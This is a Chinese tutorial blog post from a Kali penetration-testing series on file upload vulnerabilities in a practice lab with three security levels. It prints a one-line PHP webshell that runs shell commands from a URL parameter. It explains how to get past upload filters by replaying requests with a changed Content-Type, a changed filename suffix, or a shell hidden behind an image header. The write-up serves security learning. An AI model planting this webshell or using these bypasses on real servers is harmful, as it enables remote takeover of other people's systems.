kali渗透学习-web渗透手动漏洞挖掘(四)

文件上传漏洞
【经典漏洞,本身为一个功能,根源:对上传文件的过滤机制不严谨】
编写一句话,然后直接上传文件测试:

<?php echo shell_exec($_GET['cmd']);?>

直接上传webshell
看是否上传成功
在这里插入图片描述
在这里插入图片描述
进行一句话测试
在这里插入图片描述
绕过过滤机制
低安全级别代码没有过滤机制
在这里插入图片描述
绕过:可截包重放,修改上传文件大小等限制

中安全级别在这里插入图片描述
针对文件类型有过滤需要image/jpeg类型
进行截断,重放修改文件类型
绕过:截包,修改上传类型Content-Type,重放
mimetype:此命令根据文件内容特征字节进行判断文件类
在这里插入图片描述
高安全级别
在这里插入图片描述
不仅针对文件类型有过滤需要image/jpeg类型,还有对于文件名字有过滤
在这里插入图片描述
绕过:截断,修改文件后缀名filename,重放

还有一种严格的防护机制,会对文件头传输的内容进行识别

绕过姿势:用木马/shell替换掉所有图片内容,保留头部

在这里插入图片描述
漏洞防护:

对上传文件的权限进行限制

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值